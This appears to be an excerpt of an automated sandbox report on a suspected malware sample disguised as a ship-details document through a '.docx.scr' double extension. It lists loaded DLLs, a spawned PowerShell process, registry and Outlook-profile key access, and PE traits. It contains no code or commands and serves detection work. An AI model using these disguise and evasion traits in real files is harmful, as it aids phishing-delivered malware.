Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Iecr.pdb source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Source:	Binary string: Iecr.pdbSHA256 source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_05C31710 push ss; ret	0_2_05C316D3
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_05C34F7A pushad ; iretd	0_2_05C34F81
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_05C348E0 pushad ; retf	0_2_05C348E1
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_05C34848 push eax; retf	0_2_05C34849
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_05C3BA98 push esp; iretd	0_2_05C3BAA5
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 0_2_0774DDE0 push eax; retf	0_2_0774DDE1
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FE9C30 push esp; retf 0305h	3_2_02FE9D55
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_02FE2398 push edi; ret	3_2_02FE23BE
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F81FD0 push FFFFFFC2h; retn 000Ch	3_2_06F81FF3
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F8ACC9 push es; ret	3_2_06F8ACD4
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 3_2_06F8E8FA push es; ret	3_2_06F8E934

Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Static PE information: section name: .text entropy: 7.655093124415781

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: docx.scr

Static PE information: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
